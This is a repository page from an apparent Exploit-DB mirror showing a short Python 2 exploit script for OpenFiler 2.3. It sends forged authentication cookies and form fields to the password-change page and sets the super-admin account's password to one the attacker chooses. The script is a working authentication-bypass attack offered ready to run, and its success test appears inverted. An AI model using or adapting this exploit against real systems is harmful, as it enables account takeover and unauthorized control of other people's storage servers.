bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/7972.py
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

26 lines
No EOL
921 B
Python
Executable file
Raw Blame History

#Exploit code (PoC) for OpenFiler 2.3 (current)
#by just a nonroot user
#http://nonroot.blogspot.com/
#
import urllib,sys,re
#host example: https://192.168.20.5:446/
host=raw_input("OpenFiler system ( include http and /): ")
#Super admin user
user='openfiler'
#What pass do you want?
password='nonroot'
#use it please ;)
fake="myladyastridcita"
data= urllib.urlencode({'current_password':fake , 'passcookie': fake, 'usercookie': user,'new_password': password,'confirm_new_password': password,'userauthenticated':"666"})
response= urllib.urlopen(host+"account/password.html", data)
data=response.read()
lookup=re.compile("successfully").search
match=lookup(data)
if not match:
print "Ok, now go and login with user:", user, " and password: ", password, " in ",host
else:
print "Exploit failed, sorry, go and find some new bug or check this code and fix it!"
sys.exit(2)
sys.exit(0)
# milw0rm.com [2009-02-03]
Reference in a new issue View git blame Copy permalink